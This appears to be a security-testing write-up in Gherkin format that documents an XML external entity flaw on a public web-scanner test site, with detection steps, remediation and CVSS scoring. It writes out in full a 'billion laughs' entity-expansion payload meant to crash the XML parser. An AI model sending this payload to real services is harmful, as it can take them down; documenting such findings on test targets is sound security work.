## Version 1.4.1
## language: en

Feature:
   TOE:
    Web scanner test site
  Category:
    Improper Restriction of XML External Entity Reference
  Location:
    http://www.webscantest.com/business/account.php
  CWE:
    CWE-611: Improper Restriction of XML External Entity Reference
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject XXE
  Recommendation:
    Protect each text box

  Background:
  Hacker's software:
    |<software name>       | <version>      |
    | Windows              | 10 Pro         |
    | Mozilla firefox      | 74.0 (64-bit)  |
    | Burpsuite            | 2.1.04         |
  TOE information:
    Given I am accessing the site http://www.webscantest.com/
    And Entered to site .../soap/demo/
    Then I can see there is a product list
    And a button to add products

  Scenario: Normal use case
    Given I access .../soap/demo/api/
    Then I can fill the inputs
    And add a new product

  Scenario: Static detection
    Given I do not have access to the source code
    Then I can not make static detection

  Scenario: Dynamic detection
    Given I access to .../soap/demo/api/
    Then I add the following to the XML payload
    """
    <!DOCTYPE replace [<!ENTITY xxe "Vulnerable"> ]>
    """
    And add "&xxe;" to one of the fields (like description)
    Then I get the result reflected with
    """
    <description xsi:type="xsd:string">Vulnerable</description>
    """
    And I know that is vulnerable

  Scenario: Exploitation
    Given I access to .../soap/demo/api/
    Then I can write the following payload
    """
    <!DOCTYPE TEST [
     <!ELEMENT TEST ANY>
     <!ENTITY LOL "LOL">
     <!ENTITY LOL1 "&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;">
     <!ENTITY LOL2 "&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;">
     <!ENTITY LOL3 "&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;">
     <!ENTITY LOL4 "&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;">
     <!ENTITY LOL5 "&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;">
     <!ENTITY LOL6 "&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;">
     <!ENTITY LOL7 "&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;">
     <!ENTITY LOL8 "&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;">
     <!ENTITY LOL9 "&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;">
    ]>
    """
    And cause a DOS

  Scenario: Remediation
    Escape external input before executing it

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.2/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    8.2/10 (High) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.7 (Critical) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:L/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2020-04-22
